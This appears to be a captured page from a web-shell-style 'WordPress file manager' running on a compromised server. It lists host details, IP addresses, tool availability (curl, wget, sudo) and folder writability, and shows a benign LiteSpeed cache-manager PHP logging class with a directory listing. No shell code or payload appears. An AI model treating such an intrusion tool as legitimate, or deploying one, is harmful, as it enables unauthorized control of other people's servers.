✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server.blackpussy.asia ​🇻​♯➤ 5.14.0-611.20.1.el9_7.x86_64 #1 SMP 🇾​♯➤ 2026

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 163.245.207.76 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.243
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗞 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ mail,mb_send_mail
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /usr/local/lsws/add-ons/webcachemgr/src//LogEntry.php
<?php

/** *********************************************
 * LiteSpeed Web Server Cache Manager
 *
 * @author LiteSpeed Technologies, Inc. (https://www.litespeedtech.com)
 * @copyright (c) 2018-2019
 * *******************************************
 */

namespace Lsc\Wp;

class LogEntry
{

    /**
     * @var int
     */
    protected $lvl;

    /**
     * @var string
     */
    protected $msg;

    /**
     *
     * @var null|string
     */
    protected $prefix;

    /**
     *
     * @var int[]
     */
    protected $timestamp;

    /**
     *
     * @param string  $msg
     * @param int     $lvl
     */
    public function __construct( $msg, $lvl )
    {
        $this->msg = $msg;
        $this->lvl = $lvl;
        $this->timestamp = time();
    }

    /**
     *
     * @param string  $msg
     */
    public function append( $msg )
    {
        $this->msg .= $msg;
    }

    /**
     *
     * @return int
     */
    public function getLvl()
    {
        return $this->lvl;
    }

    /**
     *
     * @return string
     */
    public function getMsg()
    {
        $msg = ($this->prefix == null) ? '' : "{$this->prefix} ";

        if ( $this->msg ) {
            $msg .= $this->msg;
        }

        return $msg;
    }

    /**
     *
     * @param int  $logLvl
     * @return string
     * @throws LSCMException  Thrown indirectly.
     */
    public function getOutput( $logLvl )
    {
        if ( $this->lvl > $logLvl ) {
            return '';
        }


        $timestamp = date('Y-m-d H:i:s', $this->timestamp);
        $addTagInfo = Logger::getAdditionalTagInfo();
        $lvl = '[' . Logger::getLvlDescr($this->lvl) . ']';
        $msg = $this->getMsg();

        return "{$timestamp} {$addTagInfo} {$lvl}  {$msg}\n";
    }

}

Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]

Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
16 Apr 2026 11.11 PM
root / root
0775
Context
--
16 Apr 2026 11.11 PM
root / root
0775
Panel
--
16 Apr 2026 11.11 PM
root / root
0775
ThirdParty
--
16 Apr 2026 11.11 PM
root / root
0775
View
--
16 Apr 2026 11.11 PM
root / root
0775
WpWrapper
--
16 Apr 2026 11.11 PM
root / root
0775
AjaxResponse.php
1.792 KB
16 Apr 2026 11.11 PM
root / root
0664
CliController.php
40.767 KB
16 Apr 2026 11.11 PM
root / root
0664
DashNotifier.php
9.892 KB
16 Apr 2026 11.11 PM
root / root
0664
LSCMException.php
0.636 KB
16 Apr 2026 11.11 PM
root / root
0664
LogEntry.php
1.721 KB
16 Apr 2026 11.11 PM
root / root
0664
Logger.php
17.947 KB
16 Apr 2026 11.11 PM
root / root
0664
PanelController.php
56.12 KB
16 Apr 2026 11.11 PM
root / root
0664
PluginVersion.php
22.579 KB
16 Apr 2026 11.11 PM
root / root
0664
RedefineGlobalFuncs.php
0.845 KB
16 Apr 2026 11.11 PM
root / root
0664
UserCommand.php
29.153 KB
16 Apr 2026 11.11 PM
root / root
0664
Util.php
18.417 KB
16 Apr 2026 11.11 PM
root / root
0664
WPCaller.php
54.583 KB
16 Apr 2026 11.11 PM
root / root
0664
WPDashMsgs.php
4.751 KB
16 Apr 2026 11.11 PM
root / root
0664
WPInstall.php
16.813 KB
16 Apr 2026 11.11 PM
root / root
0664
WPInstallStorage.php
33.236 KB
16 Apr 2026 11.11 PM
root / root
0664

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF